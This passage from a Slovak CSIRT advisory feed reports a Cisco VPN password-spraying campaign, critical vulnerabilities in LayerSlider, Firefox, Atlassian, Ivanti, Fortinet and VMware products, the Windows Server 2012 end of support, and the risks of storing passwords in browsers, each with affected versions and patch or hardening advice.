Spoločnosť Cisco nedávno upozornila na rozsiahlu kampaň zameranú na pokusy o prihlásenie sa jedným heslom do rôznych účtov naprieč zákazníkmi, ktorí využívajú Cisco VPN. Pokusy o prihlásenie boli zaznamenané do služby VPN so vzdialeným prístupom (RAVPN) nakonfigurované v zariadeniach Cisco Secure Firewall. Útoky sa zrejme zameriavajú aj na iné služby VPN a zatiaľ nie je jasné, či sú súčasťou prieskumnej činnosti alebo cieleného útoku. Bezpečnostní výskumníci Aaron Martin a Chris Grube zverejnili informácie, že táto aktivita môže súvisieť s botnetom „Brutus“, ktorý v súčasnosti využíva viac ako 20 000 IP adries po celom svete.

Počas tzv. password-spraying útoku sa útočník pokúša o prihlásenie na rôzne používateľské účty pomocou toho istého hesla. Útok na službu VPN sa môže vyznačovať niekoľkými charakteristickými znakmi. Pri pokuse o pripojenie s programom Cisco Secure Client (AnyConnect) sa používateľom zobrazí chyba “Unable to complete connection: Cisco Secure Desktop not installed on the client“ (chyba sa môže objaviť aj pri iných problémoch s pripojením VPN, a preto je dôležité skontrolovať aj ostatné znaky). Neschopnosť nadviazať spojenie VPN pomocou programu Cisco Secure Client (AnyConnect), keď je zapnutá funkcia Firewall Posture (HostScan) patrí medzi jeden z nich. Ďalším znakom môže byť neobvyklé zvýšenie množstva požiadaviek na overenie v systémových logoch.

Okrem toho, VPN koncentrátor Cisco Secure Firewall Adaptive Security Appliance (ASA) alebo Threat Defense (FTD) vykazuje v systémových logoch neobvyklé množstvo požiadaviek o overenie. Znakmi takéhoto útoku môžu byť veľké počty detegovaných neúspešných pokusov o prístup. Pokiaľ väčšie množstvá pokusov smerujú z rovnakých IP adries a záznamy obsahujú aj úspešné prihlásenie z nich, môže ísť o vážny bezpečnostný incident.

Pre zvýšenie úrovne ochrany a bezpečnosti spoločnosť Cisco odporúča:

Zapnúť protokolovanie na vzdialený syslog server pre zlepšenie analýzy a korelácie incidentov.
Zabezpečiť predvolené profily vzdialeného prístupu VPN nasmerovaním nepoužívaných predvolených profilov pripojenia na server AAA sinkhole, pre zabránenie neoprávneného prístupu.
Použiť TCP shun (shun list) na manuálne blokovanie škodlivých IP adries a nakonfigurujte control-plane ACL pre odfiltrovanie neoprávnených verejných IP adries z relácií VPN. (Prostredníctvom mailu môžete požiadať o množinu IoC.)
Použiť overovanie na základe certifikátov pre RAVPN, ktoré poskytuje bezpečnejšiu metódu overovania ako tradičné poverenia.

Poskytnutie IoC:

Zainteresované inštitúcie spadajúce pod konštituenciu VJ CSIRT môžu požiadať o množinu IoC pre účely odfiltrovania možných škodlivých IP adries mailom na info(at)csirt.sk

Možné naviazanie na APT29

Bezpečnostní výskumníci Aaron Martin a Chris Grube v svojej analýze botnetu Brutus uvádzajú, že pokusy o prienik do VPN sú cielené okrem zariadení Cisco aj na zariadenia od výrobcov Fortinet, Palo Alto, SonicWall a dokonca na webové aplikácie používajúce Active Directory pre autentifikáciu.

Brutus strieda svoje IP každých šesť pokusov, aby sa vyhol detekcii a blokovaniu, pričom používa veľmi špecifické nezverejnené používateľské mená, ktoré nie sú dostupné vo verejných databázach.

Prevádzkovatelia botnetu doposiaľ neboli jednoznačne identifikovaní, ale výskumníkom sa podarilo identifikovať dve IP adresy, ktoré boli v minulosti spojené s aktivitami APT29 (Midnight Blizzard, NOBELIUM, Cozy Bear). Skupina APT 29 pravdepodobne pracuje pre ruskú zahraničnú spravodajskú službu (SVR).

Odkazy:

https://www.cisco.com/c/en/us/support/docs/security/secure-firewall-threat-defense/221806-password-spray-attacks-impacting-custome.html

https://www.bleepingcomputer.com/news/security/cisco-warns-of-password-spraying-attacks-targeting-vpn-services/

https://annoyed.engineer/2024/03/23/the-brutus-botnet/

Kritická zraniteľnosť v doplnku WordPress

Marian Danko — Mon, 08 Apr 2024 07:04:08 +0000

Doplnok obľúbenej platformy na tvorbu webových stránok obsahuje kritickú zraniteľnosť typu SQL injection, ktorá umožňuje neautentifikovaným útočníkom pripojiť ďalšie dotazy do existujúcich dotazov SQL. To môže viesť k neoprávnenému prístupu k citlivým informáciám z databázy, ako napríklad hash hesiel. Chyba sa nachádza v zásuvnom module WordPress s názvom LayerSlider.

Zraniteľné systémy:

LayerSlider 7.9.11- 7.10.0

Opis činnosti:

CVE-2024-2879 (CVSS skóre 9,8)

Kritická zraniteľnosť CVE-2024-2879 typu SQL injection sa nachádza v zásuvnom module LayerSlider pre platformu WordPress. Chyba sa týka nedostatočného escapovania parametrov zadaných používateľom a absencie funkcie wpdb::prepare(), čo umožňuje neautentifikovanému útočníkovi pristupovať do existujúcich dotazov SQL. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi neoprávnený prístup k citlivým informáciám pomocou injektovania SQL príkazov.

Boli objavené ďalšie bezpečnostné chyby v doplnkoch WordPress, ako napríklad Tutor LMS (CVE-2024-1751, skóre CVSS: 8,8) a Contact Form Entries (CVE-2024-2030, skóre CVSS: 6,4), ktoré mohli byť zneužité na zverejnenie informácií, resp. injektovanie ľubovoľných webových skriptov.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Prístup k citlivým informáciám

Odporúčania:

Bezodkladná aktualizácia doplnku LayerSlider na verziu 7.10.1.

Odkazy:

https://nvd.nist.gov/vuln/detail/CVE-2024-2879

https://thehackernews.com/2024/04/critical-security-flaw-found-in-popular.html

https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/

https://layerslider.com/release-log/

Zero day zraniteľnosti v prehliadači Firefox

Marian Danko — Wed, 27 Mar 2024 13:50:31 +0000

Spoločnosť Mozilla vydala bezpečnostné aktualizácie na opravu dvoch zero-day zraniteľností vo webovom prehliadači Firefox. Zraniteľnosti boli objavené počas hackerskej súťaže Pwn20wn Vancouver 2024. Na obe zraniteľnosti poukázal výskumník Manfred Paul.

Zraniteľné systémy:

Firefox < 124.0.1 a Firefox ESR < 115.9.1

Opis činnosti:

CVE-2024-29944 (Firefox a Firefox ESR)

Zero-day zraniteľnosť CVE-2024-29944 umožňuje útočníkovi zvýšenie oprávnení a vykonanie ľubovoľného kódu JavaScript v nadradenom procese. Chyba neovplyvňuje mobilné verzie Firefoxu.

CVE-2024-29943 (Firefox)

Zraniteľnosť CVE-2024-29943 sa týka obchádzania kontroly v rozsahu pamäte objektov JavaScript a to útočníkovi umožňuje čítať alebo zapisovať mimo povolené hodnoty. Úspešné zneužitie umožňuje spustenie ľubovoľného kódu.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Spustenie ľubovoľného kódu
Zvýšenie oprávnení

Odporúčania:

Bezodkladná aktualizácia Firefox na verziu 124.0.1, Firefox ESR na verziu 115.9.1.

Odkazy:

https://www.mozilla.org/en-US/security/advisories/mfsa2024-15/#CVE-2024-29943

https://www.bleepingcomputer.com/news/security/mozilla-fixes-two-firefox-zero-day-bugs-exploited-at-pwn2own/

https://www.mozilla.org/en-US/security/advisories/mfsa2024-16/

Prečo je ukladanie hesiel do prehliadača nebezpečné? [Infografika]

Marian Danko — Wed, 27 Mar 2024 13:47:17 +0000

S rastúcim počtom webových služieb a online účtov sa zvyšuje aj počet hesiel, ktoré si musí človek pamätať. Ako reakciu na túto potrebu si mnohí používatelia zvolili ukladanie hesiel do svojich internetových prehliadačov a používanie automatického vypĺňania. Je to pohodlné riešenie, ale webové prehliadače sú primárne navrhnuté na zobrazovanie webového obsahu a nie na zabezpečené ukladanie hesiel. V tomto článku sa dočítate prečo je nebezpečné ukladať svoje heslá v prehliadači a o odporúčaniach ako si ich ochrániť.

Heslá sú jedným z mála spôsobov, ako dokážeme zabezpečiť svoje účty. Odborníci z oblasti IT pravidelne vyzývajú používateľov, aby si tvorili bezpečné heslá – v súlade so špecifickými požiadavkami. Bližšie podrobnosti o bezpečnosti a vytváraní hesiel sme si pre Vás pripravili začiatkom septembra.

Obrázok 1 Bezpečné heslá Zdroj: CSIRT

Nech sú vaše heslá akokoľvek bezpečné, v momente ich uloženia vo webovom prehliadači čelíte viacerým rizikám.

Riziká ukladania hesiel v prehliadačoch

1. Prvé nebezpečenstvo predstavuje fyzický prístup k odomknutým zariadeniam obete, kedy útočník dokáže uložené heslá zneužiť na neoprávnený prístup do ,,zapamätaných“ systémov a následné vykonanie úkonov podľa úrovne oprávnenia účtu. Útočník dokonca môže heslá extrahovať na ďalšie použitie.

2. Správca hesiel vo webových prehliadačoch ukladá heslá do šifrovaných databáz, avšak pre konkrétne prehliadače sú verejne známe presné umiestnenia súborov na disku, ktoré obsahujú históriu prehliadania, databázu hesiel a dokonca aj hlavné heslo k šifrovaným databázam. Túto skutočnosť zneužívajú rôzne rodiny malvérov, ktoré zbierajú základné informácie o kompromitovanom zariadení, históriu prehliadačov a komunikačných platforiem, uložené heslá prehliadačov, obsah schránky operačného systému (eng. clipboard) alebo iných zvolených súborov a tieto údaje rôznymi metódami zasielajú útočníkovi. Medzi najznámejšie malvéry zamerané na získavanie citlivých dát možno zaradiť napr. Redline, Racoon, Lumma, SnakeKeylogger, Agent Tesla a ďalšie. Znalosť umiestnenia kľúčových súborov je taktiež využívaná aj v rámci riešenia kybernetických bezpečnostných incidentov a vyšetrovania trestných činov počítačovej kriminality.

3. Mimoriadne riziko predstavuje možnosť previazania prehliadača s kontom používateľa (napr. konto na službe MICROSOFT alebo GOOGLE), ktoré umožňuje pokročilé funkcie práce na viacerých zariadeniach, ako sú napr. zdieľanie histórie webového prehliadania, záložiek a synchronizácie uložených hesiel. Synchronizácia hesiel na jednej strane zvyšuje komfort používateľa, na druhej strane však predstavuje dodatočné riziko, kedy sa k heslám možno dostať kompromitáciou ľubovoľného zariadenia asociovaného s daným kontom.

Ako odstrašujúci príklad zneužitia tejto funkcionality možno použiť kybernetický bezpečnostný incident, ktorý spoločnosť CISCO riešila v roku 2022. Jeden z interných zamestnancov mal webový prehliadač na pracovnom zariadení previazaný so súkromným GOOGLE účtom a využíval synchronizáciu hesiel, vrátane prihlasovacích údajov do podnikovej VPN siete. Tento používateľ sa stal obeťou phishingového útoku, počas ktorého útočník získal prístup k jeho GOOGLE účtu a tým aj ku všetkým heslám. Prihlasovanie do VPN síce bolo chránené prostredníctvom viacfaktorovej autentifikácie, ale útočníkovi sa tento bezpečnostný prvok podarilo obísť prostredníctvom techník sociálneho inžinierstva, ktoré sú bližšie popísané na tomto odkaze v článku.

4. Ukladanie údajov v prehliadači zvyšuje aj úspešnosť phishingových kampaní, kedy prehliadač pri rozpoznaní formulára na zadanie osobných alebo kartových údajov ponúkne používateľovi možnosť automatického vypĺňania. Táto funkcia je mimoriadne riziková dokonca aj v prípade, že si obeť uvedomí, že sa stala obeťou phishingu ešte pred odoslaním formulára, pretože pokročilé phishingové frameworky priebežne zasielajú zadávané údaje útočníkovi.

5. Okrem funkcií zabudovaných priamo v prehliadači je na ukladanie hesiel možné použiť aj externé doplnky, zásuvné moduly a pluginy, ktoré majú rôznu kvalitatívnu úroveň. Útočníci rôzne rozšírenia dokonca používajú ako mechanizmus šírenia škodlivého kódu, nakoľko používateľ medzi veľkým množstvom dostupných možností často nedokáže rozlíšiť legitímne aplikácie od tých škodlivých.

6. Vyššie uvedené rozšírenia rovnako ako samotné prehliadače môžu obsahovať bezpečnostné zraniteľnosti, ktoré možno zneužiť na naplnenie rôznych cieľov, od získania neoprávneného prístupu k citlivým údajom až po vzdialené vykonanie škodlivého kódu. Tie najzávažnejšie zraniteľnosti je možné zneužiť vzdialene a bez interakcie obete. Preto je dôležité všetky používané zariadenia a aplikácie pravidelne aktualizovať.

Výhody používania aplikácií na správu hesiel

Na ukladanie hesiel sa odporúča používať výhradne špecializované nástroje, tzv. aplikácie na správu hesiel (eng. password manager), ktoré boli navrhnuté s primárnym dôrazom na zabezpečenie dát, robustné šifrovanie a ochranu pred rôznymi scenármi odcudzenia prihlasovacích údajov. Tieto aplikácie umožňujú heslá prehľadne organizovať do kategórií a dokonca vykonávajú analýzy nad heslami, aby používateľov upozornili na recykláciu hesiel alebo skryté a predvídateľné vzory pri generovaní hesiel, vrátane jednoduchých úprav pri pravidelných zmenách hesiel. Niektoré služby dokonca heslá overujú voči online databázam uniknutých hesiel, čím umožňujú reagovať na prípadné úniky dát. Jednou z najznámejších služieb umožňujúcich preverenie, či došlo k úniku Vašich prihlasovacích údajov, je HAVEIBEENPWNED, s ktorou CSIRT.SK v roku 2021 uzatvoril spoluprácu. Okrem hesiel umožňujú aj ukladanie súborov – napr. obrázkov a iného kryptografického materiálu (certifikáty, SSH kľúče a pod). Heslá skopírované do schránky operačného systému v nej udržujú len po obmedzený čas, čím znižujú riziko ich krádeže. V prípade využívania online služieb na manažment hesiel je treba brať do úvahy aj riziko, že bezpečnostné zraniteľnosti a incidenty u Vášho poskytovateľa môžu priamo ohroziť aj Vaše heslá.

Odporúčania ako sa chrániť

1.Používajte silné heslá: Používajte silné heslá, ktoré obsahujú kombináciu veľkých a malých písmen, číslic a špeciálnych znakov. Odporúčame používať passphrase, frázy, ktoré si používateľ dokáže ľahšie zapamätať. NEPOUŽÍVAJTE však verše pesničiek, odseky z kníh, populárne citáty, osobné údaje alebo heslá, ktoré ste niekde videli (napr. slogany, reklamy….). VJ CSIRT odporúča používať diakritiku pri vytváraní frázy, kde je to možné.

Obrázok 2 Bezpečné heslá Zdroj: CyberHoot

2. Nepoužívajte funkciu automatického ukladania hesiel a dopĺňania vo webových prehliadačoch. Namiesto toho si zapamätajte svoje heslá alebo použite aplikácie na správcu hesiel, ako napríklad KeePass, LastPass, 1Password alebo Bitwarden.

3. Striktne oddeľujte súkromné a pracovné zariadenia.

4. Na všetkých službách, kde je to možné, majte aktivované viacfaktorové overovanie prístupu. Môžete si nastaviť overenie biometriou, odosielanie SMS správ, telefonický rozhovor alebo používať generátor tokenov pre vytvorenie jednorazového kódu či push notifikácie pre autentifikáciu do účtu (Duo Mobile, Authy, Google Authentificator). Svojich zamestnancov a známych vzdelajte aj o aktívne zneužívaných metódach obchádzania viacfaktorovej autentifikácie.

5. Pravidelne aktualizujte operačný systém, používané aplikácie a ich rozšírenia, nakoľko môžu obsahovať ľahko zneužiteľné bezpečnostné zraniteľnosti.

6. Používané aplikácie, externé doplnky, zásuvné moduly a pluginy vždy inštalujte z overených a dôveryhodných zdrojov.

7. Hardening prehliadačov. Cieľom hardeningu prehliadačov je znížiť možný dopad zraniteľností a zvýšiť odolnosť prehliadača pred útokmi. Slúži nám na to najmä vhodná konfigurácia, ktorá zahŕňa blokovanie cookies, blokovanie načítavania obsahu z neznámych alebo nebezpečných zdrojov, aktiváciu dodatočných bezpečnostných funkcií ako blokovanie reklám, vypnutie telemetrie a mnoho ďalších nastavení. Odolnosť svojho prehliadača si môžete overiť prostredníctvom online testu.

8. Používateľské konto. Pri práci s prehliadačmi na operačnom systéme by ste mali vždy používať používateľské konto s nízkymi oprávneniami (user account) a nie administrátorské konto (administrator account).

V tomto článku sme si ukázali riziká spojené s ukladaním hesiel vo webových prehliadačoch, popísali výhody používania aplikácií na správu hesiel a odporúčania ako svoje heslá chrániť. Pri práci s heslami je potrebné dodržiavať základné zásady kybernetickej hygieny a držať sa vyššie uvedených odporúčaní VJ CSIRT.

Sledujte nás na sociálnych sieťach:

Zdroje:

https://blog.talosintelligence.com/recent-cyber-attack/

https://www.kaspersky.com/blog/how-to-store-passwords-securely/48784/

https://www.tomsguide.com/news/dont-let-web-browsers-save-passwords

https://news.trendmicro.com/2023/11/27/is-it-safe-to-save-passwords-in-your-browser/

https://www.ncsc.gov.uk/collection/top-tips-for-staying-secure-online/password-managers

https://coveryourtracks.eff.org/

Koniec podpory pre Windows Server 2012 a Windows Server 2012 R2

Marian Danko — Mon, 25 Mar 2024 12:38:23 +0000

Spoločnosť Microsoft plánovane zrušila podporu pre Windows Server 2012 a Windows Server 2012 R2. Po dátume 10. októbra 2023 už tieto produkty nebudú dostávať aktualizácie zabezpečenia, aktualizácie nesúvisiace so zabezpečením, opravy chýb, technickú podporu a ani aktualizácie technického obsahu online. Odporúčame prejsť na novšiu verziu operačného systému alebo používať rozšírenie ESU na dobu určitú.

Zákazníkom Microsoft odporúča inovovať na systém Windows Server 2022. Ak nemôžete inovovať na novšiu verziu, budete musieť používať rozšírené aktualizácie zabezpečenia (ESU). ESU sú k dispozícii zadarmo v Azure alebo si ich treba zakúpiť pre lokálne nasadenia. Jednotky ESU budú každoročne obnovované do 13. októbra 2026. Zákazníci majú možnosť používať Azure Arcto, automaticky nasadzovať zakúpené jednotky ESU na mieste, ako aj rozšíriť zabezpečenie a správu Azure do svojho prostredia.

Životnosť Windows Serverov

Hlavné vydania serverov Windows sa riadia politikou pevného životného cyklu spoločnosti Microsoft. To znamená, že sú podporované 10 rokov, vrátane 5 rokov bežnej podpory, po ktorej nasleduje 5 rokov rozšírenej podpory. Väčšina verzií Windows Server má tiež možnosť predĺžiť podporu o ďalšie 3 alebo 4 roky, ak si zakúpite možnosť Extended Security Update.

Plánované ukončenia podpory pre ďalšie verzie:

Verzia Koniec podpory
Windows Server 2022 Oct 14, 2031
Windows Server 2019 Jan. 9, 2029
Windows Server 2016 Jan. 12, 2027
Windows Server 2012 R2 Oct 10, 2023
Windows Server 2012 Oct 10, 2023
Windows Server 2008 R2 Jan 14, 2020
Windows Server 2008 Jan 14, 2020

Windows Server 2008 a Windows Server 2008 R2 koniec podpory

Spoločnosť Microsoft ukončila priamu podporu pre Windows Server 2008 a Windows Server 2008 R2 14. januára 2020. Ak nemôžete inovovať na novšiu verziu, budete musieť používať rozšírené aktualizácie zabezpečenia (ESU). Tretia z týchto aktualizácií zabezpečenia skončila 10. januára 2023. Ak chcete, aby bolo vaše prostredie aktuálne a zabezpečené, inovujte na najnovšiu verziu.

Existuje však možnosť 4. ESU na 1 rok, len pre Azure. Táto aktualizácia bola k dispozícii 11. januára 2023 a bude podporovaná do 9. januára 2024. Rozšírené aktualizácie zabezpečenia sú bezplatné, ak používate 2008 alebo 2008 R2 vo virtuálnych počítačoch Azure.

Odporúčania:

Inovovať aspoň na Windows Server 2019 alebo novšiu verziu
Aplikovať a používať ESU rozšírenie do 13. októbra 2026
Migrovať svoj Windows Server na UCS (University Cloud Services)

Ako získať rozšírené aktualizácie zabezpečenia (ESU) pre Windows Server 2012 a Windows Server 2012 R2 nájdete na: https://learn.microsoft.com/sk-sk/windows-server/get-started/extended-security-updates-deploy

Zdroje:

https://learn.microsoft.com/en-us/lifecycle/announcements/windows-server-2012-r2-end-of-support

https://techcommunity.microsoft.com/t5/windows-server-news-and-best/three-options-to-prepare-for-windows-server-2012-r2-end-of/ba-p/3645211

https://www.polyu.edu.hk/its/news-and-events/its-enewsletter/get-connected/2023-may/end-of-support-for-windows-server-2012-2012-r2/

https://corebts.com/blog/windows-server-2012-end-of-life-risks-options-next-steps/

Kritická zraniteľnosť v serveroch Atlassian

Marian Danko — Mon, 25 Mar 2024 12:32:49 +0000

Atlassian vydal opravy pre viac ako dve desiatky bezpečnostných chýb vrátane kritickej chyby ovplyvňujúcej Bamboo Data Center a Server. Úspešné zneužitie umožňuje injektovanie škodlivých príkazov bez toho, aby bola potrebná interakcia používateľa.

Zraniteľné systémy:

Bamboo Data Center a Server 8.2.0-8.2.9, 9.0.0-9.0.4, 9.1.0-9.1.3, 9.2.0-9.2.11 (LTS), 9.3.0-9.3.6, 9.4.0-9.4.3, 9.5.0-9.5.1 a staršie

Opis činnosti:

CVE-2024-1597 (CVSS skóre 10)

Kritická zraniteľnosť CVE-2024-1597 sa týka PostgreSQL JDBC Drivera a ovplyvňuje Bamboo Data Center a Server. Útočník môže vytvoriť škodlivý dotaz pomocou manipulácie číselných a reťazcových znakov v dotaze. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi injektovať škodlivé príkazy zneužitím parametra PreferQueryMode=SIMPLE. To vedie k obchádzaniu bezpečnostných mechanizmov parametrizovaných dotazov a umožňuje tak útok typu SQL Injection.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Injektovanie kódu
Obchádzanie zabezpečenia

Odporúčania:

Bezodkladná aktualizácia na najnovšiu verziu, ak tak nemôžete urobiť, aktualizujte svoju inštanciu na jednu z uvedených podporovaných pevných verzií:

9.5.0 – 9.5.1 na verziu: 9.6.0 (LTS) alebo 9.5.2
9.4.0 – 9.4.3 na verziu: 9.6.0 (LTS), 9.5.2 alebo 9.4.4
9.3.0 – 9.3.6 na verziu: 9.6.0 (LTS), 9.5.2 alebo 9.4.4
9.2.0 – 9.2.11 (LTS) na verziu: 9.6.0 (LTS), 9.5.2, 9.4.4 alebo 9.2.12 (LTS)
9.1.0 – 9.1.3 na verziu: 9.6.0 (LTS), 9.5.2, 9.4.4 alebo 9.2.12 (LTS)
9.0.0 – 9.0.4 na verziu: 9.6.0 (LTS), 9.5.2,9.4.4 alebo 9.2.12 (LTS)
8.2.0 – 8.2.9 na verziu: 9.6.0 (LTS), 9.5.2, 9.4.4 alebo 9.2.12 (LTS)

Odkazy:

https://thehackernews.com/2024/03/atlassian-releases-fixes-for-over-2.html

https://nvd.nist.gov/vuln/detail/CVE-2024-1597

https://jira.atlassian.com/browse/BAM-25716

https://confluence.atlassian.com/security/security-bulletin-march-19-2024-1369444862.html

https://socradar.io/critical-vulnerabilities-in-connectwise-screenconnect-postgresql-jdbc-and-vmware-eap-cve-2024-1597-cve-2024-22245/

Ivanti opravila dve kritické zraniteľnosti

Marian Danko — Fri, 22 Mar 2024 13:10:26 +0000

Spoločnosť Ivanti vydala opravu dvoch kritických zraniteľností, CVE-2023-46808 a CVE-2023-41724, ktoré sa nachádzajú v nástroji Ivanti Standalone Sentry a Ivanti Neurons for ITSM. Úspešné zneužitie umožňuje útočníkovi ľubovoľné vykonávanie príkazov. Chyby boli predmetom zneužitia troch kyberšpionážnych skupín napojených na Čínu.

Zraniteľné systémy:

Standalone Sentry 9.17.0, 9.18.0, 9.19.0 a staršie
Ivanti Neurons for ITSM 2023.1, 2023.2, 2023.3, vrátane starších

Opis činnosti:

CVE-2023-46808 (CVSS skóre 9,9)

Spoločnosť Ivanti vydala opravu pre kritickú zraniteľnosť CVE-2023-46808, ktorá ovplyvňuje Ivanti Neurons for ITSM. Táto chyba umožňuje vzdialenému autentifikovanému používateľovi zapisovať súbory na server ITSM, čo môže viesť k vykonávaniu príkazov.

CVE-2023-41724 (CVSS skóre 9,6)

Kritická zraniteľnosť CVE-2023-41724 sa nachádza v systéme Standalone Sentry. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi vykonávať ľubovoľné príkazy v operačnom systéme v rámci tej istej fyzickej alebo logickej siete. Na chybu poukázali výskumníci z Centra kybernetickej bezpečnosti NATO.

Nedávno odhalené bezpečnostné chyby v softvéri Ivanti boli podľa spoločnosti Mandiant predmetom zneužitia najmenej troch rôznych kyberšpionážnych skupín napojených na Čínu.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Ľubovoľné vykonávanie príkazov
Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia:

Standalone Sentry na verziu 9.17.1, 9.18.1 alebo 9.19.1
Ivanti Neurons for ITSM na verziu v2023.3, 2023.2 alebo 2023.1.

Odkazy:

https://thehackernews.com/2024/03/ivanti-releases-urgent-fix-for-critical.html

https://forums.ivanti.com/s/article/CVE-2023-41724-Remote-Code-Execution-for-Ivanti-Standalone-Sentry?language=en_US

https://www.helpnetsecurity.com/2024/03/20/cve-2023-41724-cve-2023-46808/

https://forums.ivanti.com/s/article/SA-CVE-2023-46808-Authenticated-Remote-File-Write-for-Ivanti-Neurons-for-ITSM?language=en_US

Kritické zraniteľnosti v produktoch Fortinet

Marian Danko — Mon, 18 Mar 2024 12:12:30 +0000

Spoločnosť Fortinet vydala varovanie pred viacerými kritickými a vysoko závažnými zraniteľnosťami v produktoch FortiClientEMS, FortiOS, FortiProxy a FortiManager. Kritické zraniteľnosti umožňujú útočníkovi vykonávanie kódu alebo príkazov prostredníctvom špeciálne vytvorených paketov alebo HTTP požiadaviek. Vysoko závažné zraniteľnosti sa týkajú obchádzania autorizácie a vykonávania ľubovoľného kódu.

Zraniteľné systémy:

FortiClientEMS 7.2.0 – 7.2.2
FortiClientEMS 7.0.0 – 7.0.10
FortiClientEMS 6.4 všetky verzie
FortiClientEMS 6.2 všetky verzie
FortiClientEMS 6.0 všetky verzie
FortiOS 7.4.0 – 7.4.1
FortiOS 7.2.0 – 7.2.5
FortiOS 7.0.0 – 7.0.12
FortiOS 6.4.0 – 6.4.14
FortiOS 6.2.0 – 6.2.15
FortiProxy 7.4.0
FortiProxy 7.2.0 – 7.2.6
FortiProxy 7.0.0 – 7.0.12
FortiProxy 2.0.0 – 2.0.13
FortiManager 7.4.0
FortiManager 7.2.0 – 7.2.3
FortiManager 7.0.0 – 7.0.10
FortiManager 6.4.0 – 6.4.13
FortiManager 6.2 všetky verzie

Opis činnosti:

CVE-2023-48788 (CVSS skóre 9,8)

Kritická zraniteľnosť CVE-2023-48788 sa nachádza v komponente DB2 Administration Server (DAS). Chyba sa týka nesprávnej neutralizácie špeciálnych prvkov v príkaze sql. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi vykonávanie kódu alebo príkazov prostredníctvom špeciálne vytvorených požiadaviek. Zraniteľnosť si nevyžaduje interakciu používateľa.

CVE-2023-42789 (CVSS skóre 9,8) a CVE-2023-42790 (CVSS skóre 8,1)

Zraniteľnosti CVE-2023-42789 a CVE-2023-42790 v systémoch FortiOS a FortiProxy súvisia s pretečením zásobníka a zapisovania mimo povolené hodnoty pamäte. Úspešné zneužitie umožňuje útočníkovi spustiť ľubovoľný kód alebo príkazy prostredníctvom špeciálne vytvorených požiadaviek HTTP.

CVE-2023-47534 (CVSS skóre 9,6)

Kritická zraniteľnosť CVE-2023-47534 v systéme FortiClientEMS sa týka nesprávnej neutralizácie prvkov vzorca v súbore CSV. Úspešné zneužitie umožňuje vzdialenému neautentifikovanému útočníkovi spustiť neoprávnený kód alebo príkazy na administrátorskej stanici prostredníctvom špeciálne vytvorených požiadaviek na server.

CVE-2023-36554 (CVSS skóre 8,1)

Vysoko závažná zraniteľnosť CVE-2023-36554 kontroly prístupu sa nachádza vo FortiWLM MEA (aplikácia rozšírenia správy) pre FortiManager a umožňuje neautentifikovanému vzdialenému útočníkovi spustenie ľubovoľného kódu alebo príkazov pomocou špeciálne vytvorených požiadaviek.

CVE-2024-23112 (CVSS skóre 8,0)

Chyba CVE-2024-23112 sa nachádza v systémoch FortiOS a ForitProxy SSLVPN a umožňuje autentifikovanému útočníkovi získať prístup k záložke iného používateľa pomocou manipulácie s URL adresou. Úspešné zneužitie umožňuje obísť autorizáciu prostredníctvom zraniteľnosti používateľského kľúča [CWE-639].

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vykonávanie kódu
Obchádzanie autorizácie

Odporúčania:

Bezodkladná aktualizácia:

FortiClientEMS 7.2.0 – 7.2.2 na verziu 7.2.3
FortiClientEMS 7.0.0 – 7.0.10 na verziu 7.0.11
FortiClientEMS na verziu 6.4
FortiClientEMS na verziu 6.2
FortiClientEMS na verziu 6.0
FortiOS 7.4 na verziu FortiOS 7.4.2
FortiOS 7.2 na verziu FortiOS 7.2.7
FortiOS 7.0 na verziu FortiOS 7.0.14
FortiOS 6.4 na verziu FortiOS 6.4.15
FortiProxy 7.4 na verziu FortiProxy 7.4.3
FortiProxy 7.2 na verziu FortiProxy 7.2.9
FortiProxy 7.0 na verziu FortiProxy 7.0.15
FortiManager 7.4.0 na verziu 7.4.1
FortiManager 7.2.0 – 7.2.3 na verziu 7.2.4
FortiManager 7.0.0 – 7.0.10 na verziu 7.0.11
FortiManager 6.2 na verziu 6.4.14

Používateľom, ktorí nemôžu aktualizovať svoj systém, odporúčame pre zmiernenie zraniteľností CVE-2023-42789 a CVE-2023-42790 vybrať metódu overenia, ktorá nie je založená na formulári (ntlm NTLM, basic Basic http, digest Digest HTTP, negotiate Negotiate, fsso Fortinet Single Sign-On (FSSO), rsso RADIUS Single Sign-On (RSSO), ssh-publickey Public key based SSH, cert Client certificate, saml SAML). Viac info tu.

Pokiaľ nemôžete aktualizovať svoje zariadenie, na zmiernenie zraniteľnosti CVE-2024-23112 je možné vypnúť webový režim SSL VPN.

Odkazy:

Kritické zraniteľnosti v produktoch VMware

Marian Danko — Mon, 18 Mar 2024 07:10:44 +0000

Spoločnosť VMware vydala bezpečnostné aktualizácie na opravu kritických zraniteľností úniku zo sandboxu v produktoch VMware ESXi, Workstation, Fusion a Cloud Foundation. Úspešné zneužitie môže viesť k úniku z virtuálnych počítačov a umožniť útočníkom získať prístup k hostiteľskému operačnému systému.

Zraniteľné systémy:

VMware ESXi
VMware Workstation Pro / Player (Workstation)
VMware Fusion Pro / Fusion (Fusion)
VMware Cloud Foundation (Cloud Foundation)

Opis činnosti:

CVE-2024-22252 a CVE-2024-22253 (CVSS skóre 9,3)

Kritické zraniteľnosti CVE-2024-22252 a CVE-2024-22253 sa nachádzajú v ovládačoch XHCI a UHCI USB a umožňujú použiť dealokované miesto v pamäti. Úspešné zneužitie si vyžaduje lokálne administrátorské oprávnenia na virtuálnom počítači a umožňuje vykonávanie kódu na hostiteľskom systéme v rámci procesu VMX.

CVE-2024-22254 (CVSS skóre 7,9)

Chyba CVE-2024-22254 sa týka softvéru VMware ESXi a umožňuje útočníkovi s právami procesu VMX zapisovať mimo povolené hodnoty pamäte, čo môže viesť k úniku zo sandboxu.

CVE-2024-22255 (CVSS skóre 7,1)

Vysoko závažná zraniteľnosť ESXi, Workstation a Fusion, CVE-2024-22255 sa nachádza v ovládači UHCI USB a môže viesť k úniku informácií z procesu VMX. Útočník potrebuje administrátorské oprávnenia vo virtuálnom stroji.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vykonávanie kódu

Odporúčania:

